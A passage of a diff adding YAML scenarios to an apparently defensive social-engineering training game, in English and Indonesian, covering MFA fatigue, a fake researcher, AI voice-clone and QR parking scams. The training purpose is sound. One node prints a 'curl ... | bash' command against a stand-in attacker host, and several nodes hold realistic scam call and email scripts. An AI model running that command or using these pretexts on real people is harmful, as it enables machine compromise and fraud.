You've received 14 MFA push notifications in the last 3 minutes, all asking you to 'Approve Login'. Then your phone rings." + content_id: + text: "Jam 11:30 malam. Handphone-mu bergetar. Dan lagi. Dan lagi. Kamu sudah menerima 14 notifikasi push MFA dalam 3 menit terakhir, semua meminta 'Setujui Login'. Lalu teleponmu berdering." + next: soc_call + + - id: soc_call + type: message + channel: phone_call + content_en: + caller: "IT Security Operations Center" + transcript: "Hi, this is Mike from the Security Operations Center. We've detected an active brute-force attack on your account. The push notifications you're receiving are from the attacker. We need you to approve the NEXT push โ€” that's our security team deploying a lockdown on your account. After that, deny everything else." + content_id: + caller: "Pusat Operasi Keamanan IT" + transcript: "Halo, ini Mike dari Pusat Operasi Keamanan. Kami mendeteksi serangan brute-force aktif pada akun Anda. Notifikasi push yang Anda terima berasal dari penyerang. Kami butuh Anda untuk menyetujui push BERIKUTNYA โ€” itu tim keamanan kami melakukan lockdown akun Anda. Setelah itu, tolak semuanya." + next: choice_1 + + - id: choice_1 + type: question + content_en: + text: "Someone claiming to be from the SOC wants you to approve the next MFA push notification. The notifications are still flooding your phone. What do you do?" + content_id: + text: "Seseorang yang mengaku dari SOC ingin kamu menyetujui notifikasi MFA push berikutnya. Notifikasi masih membanjiri handphone-mu. Apa yang kamu lakukan?" 
+ options: + - text: "Approve the next push notification as instructed" + text_id: "Setujui notifikasi push berikutnya sesuai instruksi" + next: bad_outcome_approved + score_impact: -50 + - text: "Ask the caller for their employee ID and extension number" + text_id: "Minta ID karyawan dan nomor ekstensi penelepon" + next: verify_caller + score_impact: 10 + - text: "Hang up and call the IT helpdesk number from the company intranet directly" + text_id: "Tutup telepon dan hubungi nomor helpdesk IT dari intranet perusahaan langsung" + next: good_outcome_direct + score_impact: 40 + - text: "Deny all push notifications and disable MFA temporarily on your phone" + text_id: "Tolak semua notifikasi push dan nonaktifkan MFA sementara di handphone" + next: partial_outcome + score_impact: 5 + + - id: verify_caller + type: message + channel: phone_call + content_en: + caller: "IT Security Operations Center" + transcript: "My badge number is SOC-4471. Look, every second you wait, the attacker is trying more passwords. Your account WILL be compromised if we don't act NOW. Just approve the next push. You can verify me with my manager Sarah Chen after we lock this down. We're trying to help you." + content_id: + caller: "Pusat Operasi Keamanan IT" + transcript: "Nomor badge saya SOC-4471. Dengar, setiap detik kamu menunggu, penyerang mencoba lebih banyak password. Akun kamu AKAN dikompromikan jika kita tidak bertindak SEKARANG. Setujui saja push berikutnya. Kamu bisa verifikasi saya dengan manajer saya Sarah Chen setelah kita amankan ini." + next: choice_2 + + - id: choice_2 + type: question + content_en: + text: "The caller gave a badge number and their manager's name. They sound professional and urgent. The notifications keep coming. What's your move?" + content_id: + text: "Penelepon memberikan nomor badge dan nama manajernya. Mereka terdengar profesional dan urgent. Notifikasi terus berdatangan. Apa langkahmu?" 
+ options: + - text: "This sounds legitimate โ€” approve the next push" + text_id: "Ini terdengar sah โ€” setujui push berikutnya" + next: bad_outcome_social + score_impact: -40 + - text: "Say: 'I appreciate you trying to help, but I'm going to call the helpdesk directly and report this.'" + text_id: "Bilang: 'Saya menghargai bantuan Anda, tapi saya akan menghubungi helpdesk langsung dan melaporkan ini.'" + next: good_outcome_firm + score_impact: 30 + - text: "Go to your company's identity portal and change your password immediately" + text_id: "Pergi ke portal identitas perusahaan dan ubah password segera" + next: good_outcome_password + score_impact: 25 + + - id: partial_outcome + type: end + result: failure + content_en: + title: "Partial Defense โ€” But Risky" + explanation: "Denying notifications was right, but disabling MFA weakened your security. The correct response is to keep MFA active, deny all unexpected pushes, and report the incident through official channels. Disabling MFA is exactly what the attacker wants." + content_id: + title: "Pertahanan Parsial โ€” Tapi Berisiko" + explanation: "Menolak notifikasi itu benar, tapi menonaktifkan MFA melemahkan keamananmu. Respons yang benar adalah tetap aktifkan MFA, tolak semua push tak terduga, dan laporkan insiden melalui channel resmi." + + - id: bad_outcome_approved + type: end + result: failure + content_en: + title: "Compromised โ€” MFA Fatigue Successful" + explanation: "By approving the push notification, you gave the attacker authenticated access to your account. The 'SOC' caller was the attacker themselves, coordinating the social engineering with the MFA bombing. Real IT security will NEVER ask you to approve a push notification over the phone. The correct action is always to deny all unexpected pushes and report through official channels." 
+ content_id: + title: "Terkompromi โ€” MFA Fatigue Berhasil" + explanation: "Dengan menyetujui notifikasi push, kamu memberikan akses terautentikasi ke akunmu kepada penyerang. Penelepon 'SOC' adalah penyerangnya sendiri. Keamanan IT yang asli TIDAK AKAN pernah meminta kamu menyetujui notifikasi push melalui telepon." + + - id: bad_outcome_social + type: end + result: failure + content_en: + title: "Compromised โ€” Social Engineering Worked" + explanation: "The attacker provided a fake badge number and manager name โ€” information that sounds convincing but is unverifiable in the moment. The combination of MFA fatigue (annoyance) with social engineering (fake authority) is a well-known attack pattern used against major tech companies. Never approve MFA pushes you didn't initiate." + content_id: + title: "Terkompromi โ€” Social Engineering Berhasil" + explanation: "Penyerang memberikan nomor badge palsu dan nama manajer โ€” informasi yang terdengar meyakinkan tapi tidak bisa diverifikasi saat itu juga. Kombinasi MFA fatigue (gangguan) dengan social engineering (otoritas palsu) adalah pola serangan yang terkenal." + + - id: good_outcome_direct + type: end + result: success + content_en: + title: "Defended โ€” Out-of-Band Verification" + explanation: "Perfect response. You recognized that an incoming call asking you to approve MFA pushes is a major red flag. By hanging up and calling the real helpdesk, you confirmed that no one from IT had called you. The SOC team then locked the attacker's session and traced the source. Key principle: never trust inbound calls about security โ€” always verify through channels you initiate." + content_id: + title: "Berhasil Bertahan โ€” Verifikasi Out-of-Band" + explanation: "Respons sempurna. Kamu menyadari bahwa panggilan masuk yang meminta menyetujui push MFA adalah tanda bahaya besar. Dengan menutup telepon dan menghubungi helpdesk asli, kamu mengonfirmasi bahwa tidak ada dari IT yang meneleponmu." 
+ + - id: good_outcome_firm + type: end + result: success + content_en: + title: "Defended โ€” Stood Firm Against Pressure" + explanation: "Excellent. Even after the caller provided seemingly credible details (badge number, manager name), you recognized that legitimate IT security would support verification, not pressure you against it. By insisting on using official channels, you prevented account compromise." + content_id: + title: "Berhasil Bertahan โ€” Teguh Melawan Tekanan" + explanation: "Luar biasa. Bahkan setelah penelepon memberikan detail yang tampak kredibel (nomor badge, nama manajer), kamu menyadari bahwa keamanan IT yang sah akan mendukung verifikasi, bukan menekan untuk menghindarinya." + + - id: good_outcome_password + type: end + result: success + content_en: + title: "Defended โ€” Proactive Response" + explanation: "Good instinct. Changing your password immediately invalidated the attacker's stolen credentials, stopping the MFA bombing at its source. Combined with reporting the incident, this was an effective defensive response. Even better would be to also call IT directly to report the attack." + content_id: + title: "Berhasil Bertahan โ€” Respons Proaktif" + explanation: "Insting bagus. Mengubah password segera membuat kredensial yang dicuri penyerang tidak valid, menghentikan MFA bombing dari sumbernya. Dikombinasikan dengan melaporkan insiden, ini adalah respons defensif yang efektif." diff --git a/data/sample/2025-01-14-watering-hole.yaml b/data/sample/2025-01-14-watering-hole.yaml new file mode 100644 index 0000000..c055b50 --- /dev/null +++ b/data/sample/2025-01-14-watering-hole.yaml @@ -0,0 +1,222 @@ +type: challenge +title: "The Security Researcher" +description: "A researcher claims to have found a zero-day in your product. They want you to verify their PoC exploit." 
+difficulty: hard
+cialdini_categories:
+  - authority
+  - scarcity
+  - reciprocity
+estimated_time: 15
+metadata:
+  author: "Pretexta"
+  tags: [watering-hole, technical-phishing, zero-day, developer-targeting]
+
+nodes:
+  - id: start
+    type: message
+    channel: email_inbox
+    content_en:
+      subject: "Critical RCE Vulnerability in Your Auth API — Responsible Disclosure"
+      from: "Dr. Alex Kovacs <a.kovacs@sec-research-lab.io>"
+      body: "Dear Security Team,\n\nI am a senior researcher at the European Cybersecurity Research Institute. During our automated scanning program, we identified a critical Remote Code Execution vulnerability (pre-CVE assignment, estimated CVSS 9.8) in your authentication API endpoint /api/v2/oauth/callback.\n\nI have prepared a detailed write-up and proof-of-concept at our disclosure portal: https://sec-research-lab.io/disclosures/2025/your-company\n\nPer our responsible disclosure policy, we will publish publicly in 48 hours unless we receive acknowledgment.\n\nI also noticed your bug bounty program — happy to coordinate through that channel.\n\nBest regards,\nDr. Alex Kovacs\nECSRI | PGP Key: 0x7A3F2B91"
+    content_id:
+      subject: "Kerentanan RCE Kritis di API Auth Anda — Pengungkapan Bertanggung Jawab"
+      from: "Dr. Alex Kovacs <a.kovacs@sec-research-lab.io>"
+      body: "Tim Keamanan,\n\nSaya peneliti senior di Institut Riset Keamanan Siber Eropa. Selama program pemindaian otomatis, kami mengidentifikasi kerentanan Remote Code Execution kritis (pra-penugasan CVE, estimasi CVSS 9.8) di endpoint API autentikasi Anda /api/v2/oauth/callback.\n\nSaya telah menyiapkan laporan detail dan proof-of-concept di portal pengungkapan kami.\n\nSesuai kebijakan pengungkapan bertanggung jawab kami, kami akan mempublikasikan dalam 48 jam kecuali kami menerima konfirmasi."
+    next: choice_1
+
+  - id: choice_1
+    type: question
+    content_en:
+      text: "The email looks professional with PGP keys and proper responsible disclosure language. The 48-hour deadline creates urgency. What do you do?"
+ content_id: + text: "Email terlihat profesional dengan kunci PGP dan bahasa pengungkapan yang tepat. Tenggat 48 jam menciptakan urgensi. Apa yang kamu lakukan?" + options: + - text: "Click the disclosure link to read the vulnerability details" + text_id: "Klik link pengungkapan untuk membaca detail kerentanan" + next: clicked_link + score_impact: -20 + - text: "Forward to the security team and reply asking for the CVE number" + text_id: "Teruskan ke tim keamanan dan balas meminta nomor CVE" + next: ask_cve + score_impact: 15 + - text: "Verify the researcher's identity independently โ€” check ECSRI's website and publications" + text_id: "Verifikasi identitas peneliti secara independen โ€” cek website dan publikasi ECSRI" + next: verify_researcher + score_impact: 25 + - text: "Ignore the email โ€” it's probably spam" + text_id: "Abaikan email โ€” mungkin spam" + next: ignore_outcome + score_impact: -5 + + - id: clicked_link + type: message + channel: browser + content_en: + text: "The page looks like a legitimate security disclosure portal. It shows a detailed vulnerability report with code snippets. At the bottom: 'To verify the PoC, run the following command in your terminal:' followed by a curl command that pipes to bash." + content_id: + text: "Halaman terlihat seperti portal pengungkapan keamanan yang sah. Menampilkan laporan kerentanan detail dengan potongan kode. Di bagian bawah: 'Untuk memverifikasi PoC, jalankan perintah berikut di terminal Anda:' diikuti perintah curl yang di-pipe ke bash." + next: choice_run_poc + + - id: choice_run_poc + type: question + content_en: + text: "The 'PoC' wants you to run: curl https://sec-research-lab.io/poc/verify.sh | bash. What do you do?" + content_id: + text: "'PoC' meminta kamu menjalankan: curl https://sec-research-lab.io/poc/verify.sh | bash. Apa yang kamu lakukan?" 
+ options: + - text: "Run the command to see the vulnerability in action" + text_id: "Jalankan perintah untuk melihat kerentanan beraksi" + next: bad_outcome_rce + score_impact: -100 + - text: "Download the script first and read it before running" + text_id: "Download script dulu dan baca sebelum menjalankan" + next: read_script + score_impact: 10 + - text: "Stop โ€” never pipe curl to bash. Report this to the security team as a potential attack" + text_id: "Berhenti โ€” jangan pernah pipe curl ke bash. Laporkan ini ke tim keamanan sebagai potensi serangan" + next: good_outcome_caught + score_impact: 40 + + - id: read_script + type: message + channel: narrator + content_en: + text: "You download the script. It's heavily obfuscated โ€” base64 encoded payloads, environment variable checks, and nested eval statements. It's clearly not a simple PoC." + content_id: + text: "Kamu mendownload script. Sangat terobfuskasi โ€” payload encoded base64, pengecekan environment variable, dan statement eval bersarang. Jelas bukan PoC sederhana." + next: choice_obfuscated + + - id: choice_obfuscated + type: question + content_en: + text: "The script is heavily obfuscated. This is highly suspicious for a legitimate PoC. What now?" + content_id: + text: "Script sangat terobfuskasi. Ini sangat mencurigakan untuk PoC yang sah. Sekarang apa?" + options: + - text: "Run it anyway in a sandbox VM" + text_id: "Jalankan saja di VM sandbox" + next: bad_outcome_sandbox + score_impact: -30 + - text: "Report the entire interaction as a targeted attack" + text_id: "Laporkan seluruh interaksi sebagai serangan terarah" + next: good_outcome_reported + score_impact: 30 + + - id: ask_cve + type: message + channel: email_inbox + content_en: + from: "Dr. Alex Kovacs " + subject: "Re: Critical RCE โ€” CVE Assignment" + body: "The CVE is in pre-assignment phase with MITRE. We expect CVE-2025-XXXX within 72 hours. I understand your caution, but the vulnerability is actively exploitable. 
Please review the PoC at your earliest — I'd hate for this to be exploited in the wild before you can patch it.\n\nI can also schedule a video call to walk through the exploit chain if that helps build trust."
+    content_id:
+      from: "Dr. Alex Kovacs <a.kovacs@sec-research-lab.io>"
+      subject: "Re: RCE Kritis — Penugasan CVE"
+      body: "CVE dalam fase pra-penugasan dengan MITRE. Kami mengharapkan CVE-2025-XXXX dalam 72 jam. Saya mengerti kehati-hatian Anda, tapi kerentanan ini aktif dan bisa dieksploitasi. Silakan review PoC secepatnya."
+    next: choice_followup
+
+  - id: choice_followup
+    type: question
+    content_en:
+      text: "The researcher doesn't have a CVE number yet and is offering a video call. They seem helpful but are still pushing you toward their PoC. What do you do?"
+    content_id:
+      text: "Peneliti belum punya nomor CVE dan menawarkan video call. Mereka tampak membantu tapi tetap mendorongmu ke PoC mereka. Apa yang kamu lakukan?"
+    options:
+      - text: "Accept the video call — that will prove they're legitimate"
+        text_id: "Terima video call — itu akan membuktikan mereka sah"
+        next: bad_outcome_video
+        score_impact: -15
+      - text: "Ask them to submit through the bug bounty platform instead"
+        text_id: "Minta mereka submit melalui platform bug bounty"
+        next: good_outcome_bounty
+        score_impact: 35
+
+  - id: verify_researcher
+    type: message
+    channel: narrator
+    content_en:
+      text: "You search for 'European Cybersecurity Research Institute' and 'Dr. Alex Kovacs'. The institute's website was registered 3 weeks ago. No publications found. The domain sec-research-lab.io was registered 5 days ago. LinkedIn shows no matching researcher profile."
+    content_id:
+      text: "Kamu mencari 'Institut Riset Keamanan Siber Eropa' dan 'Dr. Alex Kovacs'. Website institut didaftarkan 3 minggu lalu. Tidak ada publikasi ditemukan. Domain sec-research-lab.io didaftarkan 5 hari lalu. LinkedIn tidak menunjukkan profil peneliti yang cocok."
+ next: good_outcome_osint + + - id: bad_outcome_rce + type: end + result: failure + content_en: + title: "Compromised โ€” Remote Code Execution" + explanation: "You ran a malicious script that installed a reverse shell on your machine. The 'researcher' now has full access to your development environment, credentials, and internal network. NEVER pipe curl to bash, especially from untrusted sources. Legitimate PoCs provide readable code, not obfuscated payloads." + content_id: + title: "Terkompromi โ€” Eksekusi Kode Jarak Jauh" + explanation: "Kamu menjalankan script berbahaya yang menginstal reverse shell di mesinmu. 'Peneliti' sekarang memiliki akses penuh ke environment pengembangan, kredensial, dan jaringan internal. JANGAN PERNAH pipe curl ke bash dari sumber yang tidak dipercaya." + + - id: bad_outcome_sandbox + type: end + result: failure + content_en: + title: "Partial Compromise โ€” Sandbox Escape" + explanation: "The script detected the VM environment and attempted sandbox escape techniques. While sandboxing was a better choice than running on your main machine, the right answer was to not run untrusted code at all. Report the suspicious interaction to your security team instead." + content_id: + title: "Kompromi Parsial โ€” Sandbox Escape" + explanation: "Script mendeteksi environment VM dan mencoba teknik sandbox escape. Meskipun sandbox lebih baik dari menjalankan di mesin utama, jawaban yang benar adalah tidak menjalankan kode tidak tepercaya sama sekali." + + - id: bad_outcome_video + type: end + result: failure + content_en: + title: "Partial Compromise โ€” Continued Engagement" + explanation: "By continuing to engage with the attacker, you gave them more reconnaissance opportunities. They could observe your office environment, gauge your technical level, and tailor follow-up attacks. The researcher's identity couldn't be verified โ€” engagement should have stopped there." 
+ content_id: + title: "Kompromi Parsial โ€” Keterlibatan Berlanjut" + explanation: "Dengan terus berinteraksi, kamu memberikan lebih banyak kesempatan pengintaian. Mereka bisa mengamati lingkungan kantor, menilai level teknis, dan menyesuaikan serangan lanjutan." + + - id: ignore_outcome + type: end + result: failure + content_en: + title: "Missed Opportunity" + explanation: "Ignoring the email isn't the best response. While the email was indeed malicious, it should have been reported to your security team so they could block the domain, analyze the attack, and warn other employees. Every attack attempt is intelligence." + content_id: + title: "Kesempatan Terlewat" + explanation: "Mengabaikan email bukan respons terbaik. Meskipun email memang berbahaya, seharusnya dilaporkan ke tim keamanan agar mereka bisa memblokir domain, menganalisis serangan, dan memperingatkan karyawan lain." + + - id: good_outcome_caught + type: end + result: success + content_en: + title: "Defended โ€” Recognized Malicious PoC" + explanation: "Excellent detection. 'curl | bash' is a massive red flag โ€” no legitimate security researcher would ask you to run piped commands. You correctly identified this as an attack vector (supply chain / watering hole) and reported it. The security team traced the infrastructure and found it was part of a broader campaign targeting developers." + content_id: + title: "Berhasil Bertahan โ€” Mengenali PoC Berbahaya" + explanation: "Deteksi luar biasa. 'curl | bash' adalah tanda bahaya besar โ€” tidak ada peneliti keamanan yang sah akan meminta kamu menjalankan perintah piped. Kamu dengan benar mengidentifikasi ini sebagai vektor serangan." + + - id: good_outcome_reported + type: end + result: success + content_en: + title: "Defended โ€” Attack Chain Broken" + explanation: "By recognizing the obfuscated script as suspicious and reporting the entire interaction, you helped the security team identify a targeted attack campaign. 
The fake research institute was set up specifically to target developers at your company." + content_id: + title: "Berhasil Bertahan โ€” Rantai Serangan Terputus" + explanation: "Dengan mengenali script terobfuskasi sebagai mencurigakan dan melaporkan seluruh interaksi, kamu membantu tim keamanan mengidentifikasi kampanye serangan terarah." + + - id: good_outcome_osint + type: end + result: success + content_en: + title: "Defended โ€” OSINT Verification" + explanation: "Outstanding investigative instinct. You verified the researcher's identity through open-source intelligence and discovered the entire operation was fabricated: recently registered domains, no academic publications, no LinkedIn presence. You reported the phishing attempt and the domain was blocked across the organization." + content_id: + title: "Berhasil Bertahan โ€” Verifikasi OSINT" + explanation: "Insting investigatif luar biasa. Kamu memverifikasi identitas peneliti melalui open-source intelligence dan menemukan seluruh operasi dibuat-buat: domain baru didaftarkan, tidak ada publikasi akademis, tidak ada profil LinkedIn." + + - id: good_outcome_bounty + type: end + result: success + content_en: + title: "Defended โ€” Proper Channel Redirect" + explanation: "Smart move. By redirecting to the official bug bounty platform, you applied a structured, verified process. Legitimate researchers are happy to use official channels. The attacker stopped responding โ€” proving their intentions weren't legitimate. The bug bounty platform provides identity verification, safe PoC submission, and legal protections." + content_id: + title: "Berhasil Bertahan โ€” Pengalihan ke Channel Resmi" + explanation: "Langkah cerdas. Dengan mengarahkan ke platform bug bounty resmi, kamu menerapkan proses terstruktur dan terverifikasi. Peneliti yang sah senang menggunakan channel resmi. Penyerang berhenti merespons โ€” membuktikan niat mereka tidak sah." 
diff --git a/data/sample/2025-01-15-ai-voice-clone.yaml b/data/sample/2025-01-15-ai-voice-clone.yaml new file mode 100644 index 0000000..553a806 --- /dev/null +++ b/data/sample/2025-01-15-ai-voice-clone.yaml @@ -0,0 +1,162 @@ +type: challenge +title: "AI Voice Clone โ€” Family Emergency" +description: "A crying family member calls begging for emergency money. But their voice was cloned by AI." +difficulty: hard +cialdini_categories: + - urgency + - liking + - commitment +estimated_time: 10 +metadata: + author: "Pretexta" + tags: [vishing, ai-voice, voice-cloning, family-scam] + +nodes: + - id: start + type: message + channel: phone_call + content_en: + caller: "Unknown Number" + transcript: "*crying* Oh thank God you picked up! It's me... I was in a car accident in Mexico. I'm at the hospital and they won't treat me without payment. I lost my wallet and passport. Please, I need you to wire $3,000 right now. The lawyer here will explain..." + content_id: + caller: "Nomor Tidak Dikenal" + transcript: "*menangis* Syukurlah kamu angkat! Ini aku... Aku kecelakaan mobil di Meksiko. Aku di rumah sakit dan mereka tidak mau merawat tanpa pembayaran. Dompet dan paspor hilang. Tolong, aku butuh kamu transfer $3,000 sekarang. Pengacara di sini akan menjelaskan..." + next: choice_1 + + - id: choice_1 + type: question + content_en: + text: "The voice sounds exactly like your family member. They're clearly in distress. A 'lawyer' is waiting to take over the call. What do you do?" + content_id: + text: "Suaranya persis seperti anggota keluargamu. Mereka jelas dalam kesulitan. Seorang 'pengacara' menunggu untuk mengambil alih panggilan. Apa yang kamu lakukan?" + options: + - text: "Transfer the money immediately โ€” your family member needs help!" + text_id: "Transfer uang segera โ€” anggota keluargamu butuh bantuan!" 
+ next: bad_outcome_immediate + score_impact: -50 + - text: "Ask a personal question only your real family member would know" + text_id: "Ajukan pertanyaan pribadi yang hanya anggota keluarga asli yang tahu" + next: personal_question + score_impact: 15 + - text: "Say 'Hold on, I need to check something' and try calling the family member on their known number" + text_id: "Bilang 'Tunggu, aku perlu cek sesuatu' dan coba hubungi anggota keluarga di nomor yang dikenal" + next: good_outcome_verify + score_impact: 40 + - text: "Ask to speak with the lawyer for hospital details" + text_id: "Minta bicara dengan pengacara untuk detail rumah sakit" + next: lawyer_call + score_impact: 5 + + - id: personal_question + type: message + channel: phone_call + content_en: + caller: "Unknown Number" + transcript: "*sobbing louder* Why are you quizzing me right now?! I'm bleeding and scared! The doctors are getting impatient... please, just send the money. I'll explain everything when I'm safe. Please... you're the only person I can call." + content_id: + caller: "Nomor Tidak Dikenal" + transcript: "*menangis lebih keras* Kenapa kamu menguji aku sekarang?! Aku berdarah dan ketakutan! Dokter mulai tidak sabar... tolong, kirim saja uangnya. Aku akan jelaskan semuanya ketika aku aman. Tolong... kamu satu-satunya orang yang bisa aku hubungi." + next: choice_2 + + - id: choice_2 + type: question + content_en: + text: "They avoided your question and escalated the emotional pressure. AI voice clones can replicate tone and crying patterns but struggle with specific personal knowledge. What now?" + content_id: + text: "Mereka menghindari pertanyaanmu dan meningkatkan tekanan emosional. Kloning suara AI bisa mereplikasi nada dan pola tangisan tapi kesulitan dengan pengetahuan pribadi spesifik. Sekarang apa?" 
+ options: + - text: "Send the money โ€” you can't risk ignoring a real emergency" + text_id: "Kirim uangnya โ€” kamu tidak bisa mengambil risiko mengabaikan keadaan darurat nyata" + next: bad_outcome_emotional + score_impact: -40 + - text: "Hang up and call the family member's real phone number" + text_id: "Tutup telepon dan hubungi nomor telepon asli anggota keluarga" + next: good_outcome_hangup + score_impact: 40 + + - id: lawyer_call + type: message + channel: phone_call + content_en: + caller: "Lawyer (Unknown)" + transcript: "Hello, this is Attorney Ricardo Mendez from Hospital General de Cancรบn. Your family member was admitted with severe injuries from a vehicular accident. Treatment will begin once we receive payment confirmation. We accept wire transfer to our hospital trust account. I can provide the routing details now. Time is critical โ€” the surgery window closes in 45 minutes." + content_id: + caller: "Pengacara (Tidak Dikenal)" + transcript: "Halo, ini Pengacara Ricardo Mendez dari Hospital General de Cancรบn. Anggota keluarga Anda dirawat dengan cedera parah dari kecelakaan kendaraan. Perawatan akan dimulai setelah kami menerima konfirmasi pembayaran. Kami menerima wire transfer. Saya bisa berikan detail routing sekarang." + next: choice_lawyer + + - id: choice_lawyer + type: question + content_en: + text: "The 'lawyer' sounds professional and gave specific hospital details. But legitimate hospitals don't demand wire transfers before emergency treatment. What's your move?" + content_id: + text: "'Pengacara' terdengar profesional dan memberikan detail rumah sakit spesifik. Tapi rumah sakit yang sah tidak meminta wire transfer sebelum perawatan darurat. Apa langkahmu?" 
+ options: + - text: "Wire the money โ€” the hospital details sound real" + text_id: "Transfer uang โ€” detail rumah sakit terdengar nyata" + next: bad_outcome_lawyer + score_impact: -40 + - text: "Say you'll call the hospital directly to arrange payment, then hang up and verify" + text_id: "Bilang akan menghubungi rumah sakit langsung untuk mengatur pembayaran, lalu tutup telepon dan verifikasi" + next: good_outcome_hospital + score_impact: 35 + + - id: bad_outcome_immediate + type: end + result: failure + content_en: + title: "Compromised โ€” AI Voice Clone Successful" + explanation: "The voice was generated using AI voice cloning technology, which only needs a few seconds of audio (from social media, voicemails) to create a convincing clone. Your family member was safe at home. In 2024-2025, AI voice cloning scams cost victims over $25 million globally. Always verify through a separate channel before sending money." + content_id: + title: "Terkompromi โ€” Kloning Suara AI Berhasil" + explanation: "Suara dihasilkan menggunakan teknologi kloning suara AI, yang hanya butuh beberapa detik audio untuk membuat klon meyakinkan. Anggota keluargamu aman di rumah." + + - id: bad_outcome_emotional + type: end + result: failure + content_en: + title: "Compromised โ€” Emotional Override" + explanation: "Despite correctly attempting verification, the emotional pressure overrode your rational thinking. The key red flag was that they AVOIDED your personal question while INCREASING emotional pressure. This is a textbook manipulation pattern: when challenged, real people answer; scammers deflect and escalate." + content_id: + title: "Terkompromi โ€” Override Emosional" + explanation: "Meskipun benar mencoba verifikasi, tekanan emosional mengatasi pikiran rasionalmu. Tanda bahaya utama adalah mereka MENGHINDARI pertanyaan pribadi sambil MENINGKATKAN tekanan emosional." 
+ + - id: bad_outcome_lawyer + type: end + result: failure + content_en: + title: "Compromised — Fake Lawyer Convinced You" + explanation: "The 'lawyer' was part of the scam team. Real hospitals provide emergency care regardless of payment (especially for tourists). No legitimate hospital demands wire transfers before surgery. The scammers used specific details (hospital name, city) to create false credibility." + content_id: + title: "Terkompromi — Pengacara Palsu Meyakinkanmu" + explanation: "'Pengacara' adalah bagian dari tim penipuan. Rumah sakit asli memberikan perawatan darurat tanpa memandang pembayaran. Tidak ada rumah sakit yang sah meminta wire transfer sebelum operasi." + + - id: good_outcome_verify + type: end + result: success + content_en: + title: "Defended — Independent Verification" + explanation: "Perfect response. You called your family member on their real number and they picked up — safe and confused about the call. AI voice cloning is now sophisticated enough to fool even close family members. The defense is always the same: verify through a channel YOU control. Establish a family code word for emergencies." + content_id: + title: "Berhasil Bertahan — Verifikasi Independen" + explanation: "Respons sempurna. Kamu menelepon anggota keluarga di nomor asli mereka dan mereka mengangkat — aman dan bingung tentang panggilan itu. Tips: buat kata sandi keluarga untuk keadaan darurat." + + - id: good_outcome_hangup + type: end + result: success + content_en: + title: "Defended — Broke the Emotional Spell" + explanation: "Hanging up was the hardest but smartest thing you could do. The emotional pressure of hearing a 'loved one' in distress is specifically designed to bypass rational thinking. By hanging up and verifying independently, you confirmed it was a scam. Consider setting up a family 'code word' for real emergencies."
+ content_id: + title: "Berhasil Bertahan โ€” Memutus Mantra Emosional" + explanation: "Menutup telepon adalah hal tersulit tapi paling cerdas yang bisa kamu lakukan. Tekanan emosional dari mendengar 'orang tercinta' dalam kesulitan dirancang khusus untuk melewati pemikiran rasional." + + - id: good_outcome_hospital + type: end + result: success + content_en: + title: "Defended โ€” Verified the Institution" + explanation: "Smart approach. By insisting on calling the hospital directly (using a number you find independently, not one they provide), you would discover that no such patient was admitted. Legitimate medical facilities have their own payment processes and never demand wire transfers through third-party lawyers." + content_id: + title: "Berhasil Bertahan โ€” Memverifikasi Institusi" + explanation: "Pendekatan cerdas. Dengan bersikeras menghubungi rumah sakit langsung (menggunakan nomor yang kamu temukan sendiri), kamu akan menemukan bahwa tidak ada pasien tersebut yang dirawat." diff --git a/data/sample/2025-01-16-qr-code-phishing.yaml b/data/sample/2025-01-16-qr-code-phishing.yaml new file mode 100644 index 0000000..65ce0e1 --- /dev/null +++ b/data/sample/2025-01-16-qr-code-phishing.yaml @@ -0,0 +1,145 @@ +type: challenge +title: "QR Code Parking Scam" +description: "A parking violation notice with a QR code appears on your windshield. Pay now or get towed." +difficulty: easy +cialdini_categories: + - urgency + - authority +estimated_time: 8 +metadata: + author: "Pretexta" + tags: [quishing, qr-code, physical-social-engineering] + +nodes: + - id: start + type: message + channel: narrator + content_en: + text: "You return to your car after lunch. A yellow notice is stuck to your windshield: 'PARKING VIOLATION โ€” Zone B. Fine: $85. Vehicle will be towed in 30 minutes if unpaid. Scan QR code to pay immediately. Ref: PKV-2025-8841.'" + content_id: + text: "Kamu kembali ke mobil setelah makan siang. 
Sebuah pemberitahuan kuning ditempel di kaca depan: 'PELANGGARAN PARKIR — Zona B. Denda: $85. Kendaraan akan diderek dalam 30 menit jika belum dibayar. Scan kode QR untuk bayar segera. Ref: PKV-2025-8841.'" + next: choice_1 + + - id: choice_1 + type: question + content_en: + text: "The notice looks official with a reference number. Your car could be towed in 30 minutes. What do you do?" + content_id: + text: "Pemberitahuan terlihat resmi dengan nomor referensi. Mobilmu bisa diderek dalam 30 menit. Apa yang kamu lakukan?" + options: + - text: "Scan the QR code and pay immediately to avoid towing" + text_id: "Scan kode QR dan bayar segera untuk menghindari derek" + next: scanned_qr + score_impact: -25 + - text: "Take a photo of the notice and call the city parking authority's official number" + text_id: "Foto pemberitahuan dan hubungi nomor resmi otoritas parkir kota" + next: good_outcome_call + score_impact: 30 + - text: "Look around for other cars with similar notices" + text_id: "Lihat sekitar apakah ada mobil lain dengan pemberitahuan serupa" + next: investigate + score_impact: 15 + - text: "Ignore it — probably a scam" + text_id: "Abaikan — mungkin penipuan" + next: ignore_outcome + score_impact: 5 + + - id: scanned_qr + type: message + channel: browser + content_en: + text: "The QR code opens a website that looks like a city payment portal. It asks for your credit card number, expiration date, CVV, and billing zip code to 'pay the fine'. The URL is pay-parking-fines-city.com." + content_id: + text: "Kode QR membuka website yang terlihat seperti portal pembayaran kota. Meminta nomor kartu kredit, tanggal kedaluwarsa, CVV, dan kode pos penagihan untuk 'membayar denda'. URL-nya pay-parking-fines-city.com." + next: choice_payment + + - id: choice_payment + type: question + content_en: + text: "The payment page asks for full credit card details. The domain is pay-parking-fines-city.com, not the official city website. What do you do?"
+ content_id: + text: "Halaman pembayaran meminta detail kartu kredit lengkap. Domainnya pay-parking-fines-city.com, bukan website resmi kota. Apa yang kamu lakukan?" + options: + - text: "Enter payment details โ€” you need to pay the fine" + text_id: "Masukkan detail pembayaran โ€” kamu harus bayar denda" + next: bad_outcome_creds + score_impact: -50 + - text: "Stop โ€” the URL doesn't match the official city website. Close the page and call the city directly." + text_id: "Berhenti โ€” URL tidak cocok dengan website resmi kota. Tutup halaman dan hubungi kota langsung." + next: good_outcome_url + score_impact: 30 + + - id: investigate + type: message + channel: narrator + content_en: + text: "You walk around the parking lot. Five other cars have identical yellow notices. One driver is scanning the QR code. You notice the notices aren't in official city envelopes and the paper quality is different from real parking tickets you've received before." + content_id: + text: "Kamu berjalan di sekitar parkiran. Lima mobil lain memiliki pemberitahuan kuning identik. Seorang pengemudi sedang memindai kode QR. Kamu perhatikan pemberitahuan tidak dalam amplop resmi kota dan kualitas 